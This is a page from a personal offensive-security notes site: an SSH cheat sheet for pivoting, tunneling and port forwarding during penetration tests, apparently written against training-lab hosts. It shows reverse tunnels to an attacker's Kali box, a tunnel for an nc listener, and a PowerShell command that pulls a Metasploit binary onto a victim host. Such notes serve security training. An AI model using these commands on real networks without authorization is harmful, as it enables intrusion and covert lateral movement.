🌵
Rotta
  • ☕General
    • About Me
    • Recently Added
  • ☣️Offensive Tool Development
    • Windows Internals
      • Registers
      • x64 Calling Convention
      • PE File Format
        • PE File Structure
        • DOS Header, DOS Stub, & Rich Header
        • NT Headers
        • Data Directories & Section Headers
        • Import Directory Table, ILT & IAT
        • Image Export Table
        • PE Base Relocations
      • Processes & PEB Structure
      • Threads & TEB Structure
      • Event Tracing for Windows (ETW)
        • Interacting with ETW
        • ETW Tools
    • Enumeration
      • Process Enumeration
        • CreateToolhelp32Snapshot
        • EnumProcesses (psapi.h)
        • NtQuerySystemInformation
        • NtQueryInformationProcess
      • Thread Enumeration
        • CreateToolhelp32Snapshot
        • NtQuerySystemInformation
      • DLL Enumeration
    • Memory Allocation
      • Private Memory Allocation
      • Memory Mapping
    • Access Tokens
      • Page 1
    • Techniques and Exploitation Methods
      • Thread Hijacking
      • DLL Injection
      • Shellcode Reflective DLL Injection
      • APC Injection
      • Callback Process Injection
      • Function Stomping
      • DLL Sideloading
      • Local PE Injection
      • Reflective DLL Injection
      • Process Hollowing
    • PE Tips & Tricks
      • Parsing PE Headers
      • Patching IAT
      • Patching Base Relocations
      • Fixing Memory Permissions
      • Embed an EXE inside a LNK
      • PE Infection
    • Staging
      • Fetch Payload from Web Server
      • Fetch DLL from Web Server
    • Bypassing AV
      • String Hashing
      • Hiding & Obfuscating IAT
      • Custom WINAPI Functions
        • GetProcAddressHash
      • File Bloating
    • Evading EDR
      • Payload Execution Control
      • Wrapping NTAPI Functions
        • NtCreateUserProcess
        • NtQuerySystemInformation
      • PPID Spoofing
      • Call Stack Spoofing
      • NTDLL Unhooking
        • NTDLL Unhooking - From Disk
        • NTDLL Unhooking - From KnownDlls
        • NTDLL Unhooking - From Suspended Process
        • NTDLL Unhooking - From Web Server
    • Anti-Analysis Techniques
      • Anti-Debugging Techniques
        • Check If Running In a Debugger
        • Self Deleting Malware
      • Anti-Virtual Environments (AVE) Techniques
        • Detecting Hardware Specs
        • Delaying Execution
        • API Hammering
      • Reducing Binary Entropy
      • Brute Forcing Decryption Key
      • Removing MSCRT
      • Hiding / Camouflaging IAT
    • API Hooking
      • Userland Hooking
      • Custom Hooking Function
      • Open-Source Hooking Libraries
        • Microsoft's Detours Library
        • MinHook Library
    • Syscalls
      • NTAPI Syscall Process Injection
      • Direct Syscalls
        • SysWhispers
      • Indirect Syscalls
    • C2 Development
      • Consensus & Design Patterns
      • Infrastructure
      • Teamserver
      • Listeners
      • Agent Stubs
      • Encrypting Communication
    • User Defined Reflective Loader (UDRL)
    • MalDev Environment Setup
      • Setting up Dev Box
      • Setting up Pwn Box
      • Setting up Dev Server
      • Commando VM
    • Maldev Checklist
  • 👺Red Teaming
    • Setting up Infrastructure
    • External Recon
    • Internal Recon & Enumeration
      • Host Reconnaissance
      • Host Enumeration
    • Password Attacks
      • Password Spraying OWA
    • Phishing / Initial Compromise
      • Setting up Infrastructure
      • Crafting the Email
      • EvilGinx
      • Browser In Browser Attack
      • MS Office Phishing
        • VBA Macro Beacon
        • Remote Template Injection
        • HTML Smuggling
    • Privilege Escalation
      • Windows Services
      • UAC Bypass
      • Elevated SYSTEM Persistence
    • Persistence
      • Scheduled Tasks
      • Registry AutoRun
      • Startup Folder
      • COM Hijacking
      • Elevated SYSTEM Persistence
    • Payload Delivery
      • MS Office Payloads
        • Mark of the Web (MOTW).
        • Visual Basic Macro (VBA)
        • Remote Template Injection
      • SCR File Attack
    • Stealing Credentials
      • MimiKatz
      • Rubeus
      • Page 2
    • Domain Reconnaissance
      • PowerView & SharpView
      • ADSearch
    • Lateral Movement
      • User Impersonation
        • Pass The Hash (PTH)
        • Pass The Ticket (PTT)
        • Overpass The Hash
        • Token Impersonation
        • Token Store
    • Kerberos & Active Directory Attacks
      • Kerberoasting
      • ASREP Roasting
      • Kerberos Relay Attacks
      • Shadow Credentials
      • Unconstrained Delegation
      • Constrained Delegation
    • Cobalt Strike
      • Start Team Server
      • Configure Listeners
      • Beacons
        • UDRLess Beacon
    • Cracking Passwords
    • Tools & Checklists
      • Commands Cheat Sheet
      • Tools
      • Red Team Checklist
  • 🪟Active Directory
    • Active Directory Toolkit
      • Windows Tools
        • ActiveDirectory PowerShell Module
        • PowerView
        • SharpHound/BloodHound
        • Snaffler
      • Kali Linux Tools
        • Windapsearch & Ldapsearch
        • CrackMapExec
        • SMBMap
        • rpcclient
        • Impacket Toolkit
        • Bloodhound
    • Enumerating Active Directory
      • net.exe
      • Powershell Active Directory Commands
      • Powershell & .NET Classes
      • PowerView / SharpView
      • Enumerating Service Accounts
      • Enumerating Object Permissions
      • Enumerating Objects
      • Active Directory Certificate Services (AD CS)
    • Attacking Active Directory Authentication
      • AS-REP Roasting
      • Kerberoasting
      • Silver Tickets
      • Domain Controller Synchronization (Dsync Attack)
      • Kerberos Relay Attack
      • NTLM Relay Attack
      • Attacking Service Accounts
    • Password Spraying
      • Enumeration & Retrieving Password Policy
      • Creating a Target User List
      • Brute Force / Password Spraying - Linux Tools
      • Internal Spraying - From Windows
    • Lateral Movement Techniques
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copies
    • God Access
      • GenericAll Abuse
      • NTDS Tom Foolery
    • Lab Environment Setup
      • Installing Forest
      • Adding Data to Active Directory
    • Templates & Cheat Sheets
  • 🦈Penetration Testing
    • Information Gathering / Reconnaisance
      • Client Fingerprinting
      • External Recon and Enumeration
      • Network Reconnaisance
        • Scanning for Hosts
        • Initial Enumeration of AD Network
        • SMB Network Shares
      • Vulnerability Scanning
        • Nessus
        • Nmap
      • Popped a Shell
    • Pivoting, Tunneling, and Port Forwarding
      • SSH
      • Socat
      • Pivoting
        • plink.exe
        • netsh
        • Web Server Pivoting with Rpivot
      • Tunneling
        • Chisel
        • sshuttle
        • Dnscat2
      • Double Pivots
        • RDP and SOCKS Tunneling with SocksOverRDP
    • Cracking Passwords
      • Password Cracking Prerequisites
      • Mutating Wordlists
        • Identifying & Building Rules
      • Password Managers
      • SSH Private Keys
      • NTLM Toolkit
      • NTLMv2
      • MS-Cachev2 (DCC2)
      • Password Protected Files
    • Windows Privilege Escalation
      • Initial Enumeration
      • Searching For Sensitive Files
      • Searching Logs & Event Viewer
      • Escalating Privilege
      • Leveraging Windows Services
        • Service Binary Hijacking
        • Service DLL Hijacking
        • Abusing Unquoted Paths
      • Scheduled Tasks
      • Enumerating Services & Tasks
      • Dumping Secrets
    • Linux Privilege Escalation
      • Initial Enumeration
      • Automated Enumeration
      • Searching For Sensitive Information
      • Insecure File Permissions
      • Insecure System Components
        • Abusing Setuid Binaries and Capabilities
        • Sudo Trickery
        • Kernel Vulnerabilities
      • Abusing Environment Variables
      • Escaping Jail
      • Wildcard Injection
    • Exploiting Microsoft Office
      • Phishing with Teams
      • Malicious Macros
      • Windows Library Files
    • Setting up Infrastructure
      • C2 Infrastructure
      • EvilGinx2 Phishing Infrastructure
    • Ex-filtrating Data
      • WebDAV
      • SMB
      • Converting files to Hex Strings
    • Phishing
      • OSCP Phishing Guide
    • Templates & Cheat Sheets
      • OSCP Cheat Sheet
      • Impacket Cheat Sheet
      • Useful Commands
      • Penetration Test Checklist
  • 🛡️Azure & M365
    • Information Gathering / Reconnaissance
      • Domain Enumeration
      • User Enumeration
      • AADInternals
    • Attacking Authentication
      • OWA Password Spraying
      • OAuth Abuse
    • Azure AD Killchain
    • Azure Lab Setup
    • Azure & M365 Checklist
  • 🥾Security Operation Center
    • Network Traffic Analysis
      • Tcpdump
      • Wireshark
    • Windows Event Logs
      • Sysmon
    • Event Tracing for Windows (ETW)
    • Microsoft 365 Defender
    • Splunk as SIEM
      • Using Splunk Applications
      • Search Processing Language (SPL) Commands
      • Hunting with Splunk
      • Intrusion Detection
    • Incident Response Process
    • MITRE ATT&CK Framework
      • Persistence
        • Registry Run Keys
    • Templates & Cheat Sheets
      • Interview Prep
  • 🔬Digital Forensics
    • Tools
  • 🔍Malware Analysis
    • Network Traffic Analysis
      • INetSim
    • Static Analysis
      • Signatures & Fingerprints
      • Pestudio
      • x64dbg
    • Dynamic Analysis
      • Noriben
    • Reverse Engineering / Code Analysis
      • IDA
      • x64dbg
      • Returning Source Code
        • .NET Binary
    • Creating Detection Rules
    • Tools
  • 🛠️Programming
    • MASM Assembly
    • Qt
      • Setting up Qt in CLion
    • Windows Development on MacOS
      • CLion Setup
    • Windows API
      • Deleting Files
      • Strings
      • wininet.h
      • Wrapping WinAPI Functions
      • code_seg
      • Locating WinAPI Functions - Tips
    • Visual Studio
      • Creating DLL's
      • Debug & Release Mode
    • Mingw
      • Windows Development
    • Position Independent Code (PIC)
      • Creating Shellcode
      • Debugging & Development Tips
      • Strings
      • Macros
      • PIC Checklist
  • 🏠Home Lab
    • Current Setup
Powered by GitBook
On this page
  • Local Port Forwarding
  • Local Port Forwarding
  • Forwarding multiple ports
  • Local Port Forwarding Example
  • Dynamic Port Forwarding - Tunneling over SOCKS proxy
  • D_ynamic Port Forwarding from Attack Host:_
  • D_ynamic Port Forwarding From Jump Host:_
  • Using tools with Proxychains:
  • Remote Port Forwarding
  • Start SSH Service
  • Connect back to Kali Host
  • Verifying Port Forward
  • Remote Dynamic Port Forwarding
  • Create Dynamic Remote Port Forward
  • Update SOCKS Proxy - proxychains
  • Verifying Port Forward
  • Additional Info
  • Transferring Metasploit Binary to Victim (on internal network).
  • Tunneling to Kali Web Server
  • Tunneling NC Listener
  • Tunnel Internal Web Service
  • Port Forwarding an Internal Web Service
  1. Penetration Testing
  2. Pivoting, Tunneling, and Port Forwarding

SSH

This is more of a cheat sheet for commands.

PreviousPivoting, Tunneling, and Port ForwardingNextSocat

Last updated 7 months ago

Local Port Forwarding

Local Port Forwarding

 ssh -L 1234:localhost:3306 Ubuntu@10.129.202.64

Opens a listener on local port 1234 (our machine) and sends all traffic to remote port 3306 (10.129.202.64).

Forwarding multiple ports

 ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@10.129.202.64

This SSH command connects to a remote machine and sets up two local port forwards:

  1. Local port 1234 forwards to port 3306 on the remote machine (typically MySQL).

  2. Local port 8080 forwards to port 80 on the remote machine (typically HTTP).

Local Port Forwarding Example

jumphost@ubuntu ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215

Opens a listener on port 4455 (CONFULENCE01 Jump Host) and forwards all traffic through 10.4.50.215 to 172.16.50.217:445. (PGDATABASE01).

NOTE: -N flag is means execute no remote commands. No shell will be opened.

Dynamic Port Forwarding - Tunneling over SOCKS proxy

Local port forwarding is limited to one socket per SSH connection. OpenSSH allows for dynamic port forwarding. From a single listening port, packets can be forwarded to any socket that the server can route to. This works because the listening port creates a SOCKS proxy.

D_ynamic Port Forwarding from Attack Host:_

attacker@kali$ ssh -D 9050 ubuntu@10.129.202.64

NOTE: The -D flag enables dynamic port forwarding & ssh acts as a SOCKS server.

$ tail -4 /etc/proxychains.conf

# meanwile
# defaults set to "tor"
socks4 	127.0.0.1 9050

D_ynamic Port Forwarding From Jump Host:_

jump-host@ubuntu$ ssh -D 9050 ubuntu@172.167.32.11
┌──(kali㉿kali)-[~]
└─$ tail -f /etc/proxychains4.conf
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5  192.168.198.63  9050 # Ip address of jump host

Using tools with Proxychains:

Nmap:

This is my preferred nmap command to run. (172.16.50.217 is in internal network)

kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

xfreerdp:

kali@kali proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Remote Port Forwarding

Also known as Reverse Port Forwarding. In real world scenarios it is likely we'll encounter a firewall that heavily restricts inbound connections. Outbound connections however, are less likely to be blocked.

Start SSH Service

kali:~$ sudo systemctl start ssh

Connect back to Kali Host

The below command opens a port on localhost 2345 on our kali machine. All traffic is forwarded through the jump host to 10.4.50.215:5432.

victim@jump-host$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4

Verifying Port Forward

As we can see, our kali box is listening on 127.0.0.1 2345

kali@kali$ ss -ntlpu                     
Netid            State             Recv-Q            Send-Q                       Local Address:Port                          Peer Address:Port            Process            
udp              UNCONN            0                 0                                  0.0.0.0:52704                              0.0.0.0:*                                  
tcp              LISTEN            0                 128                              127.0.0.1:2345                               0.0.0.0:*                                  
tcp              LISTEN            0                 128                                0.0.0.0:22                                 0.0.0.0:*                                  
tcp              LISTEN            0                 128                                   [::]:22                                    [::]:*

Remote Dynamic Port Forwarding

NOTE: This tends to be the most optimal setup for port forwarding during engagements. We get all the benefits from Dynamic Port forwarding along with the remote configurations.

Create Dynamic Remote Port Forward

Creating a Dynamic Remote Port Forward is similar to creating a Remote port forward. We use the -R command but only with one port. We do not specify and address! Neither do we use -D!

jumphost@ubuntu$ ssh -N -R 9998 kali@192.168.118.4

Update SOCKS Proxy - proxychains

kali@kali:~$ tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998 # IP address is localhost 127.0.0.1

Verifying Port Forward

As we can see, our kali box is listening on 127.0.0.1 9998

kali@kali$ ss -ntlpu                     
Netid            State             Recv-Q            Send-Q                       Local Address:Port                          Peer Address:Port            Process            
udp              UNCONN            0                 0                                  0.0.0.0:52704                              0.0.0.0:*                                  
tcp              LISTEN            0                 128                              127.0.0.1:9998                               0.0.0.0:*                                  
tcp              LISTEN            0                 128                                0.0.0.0:22                                 0.0.0.0:*                                  
tcp              LISTEN            0                 128                                   [::]:22

Additional Info

Transferring Metasploit Binary to Victim (on internal network).

We may need to transfer a binary to a machine we've gained access to so we can port forward.

PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Tunneling to Kali Web Server

If the host has ssh we can connect back to our kali box to tunnel traffic.

This is a command to tunnel all traffic through a jump host back to our kali web server. This is useful when downloading tool to a host inside an internal network.

C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:8000 kali@192.168.45.186

Tunneling NC Listener

Like the above command, we can do the same to create a tunnel for a nc listener

C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:4444 kali@192.168.45.186

Tunnel Internal Web Service

Like we did above we can portforward an internal web service back to our kali host.

Reverse Port Forward

victim@ubuntu ssh -N -R web_service_port:localhost:local_port kali@192.168.45.186

Local Port Forward

kali@kali ssh -L local_port:localhost:web_service_port victim@victim_ip

Port Forwarding an Internal Web Service

Say we discover a web service that is running locally, or only allows 127.0.0.1 to authenticate. We can port forward the service back to our kali host and access it locally.

$ ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
🦈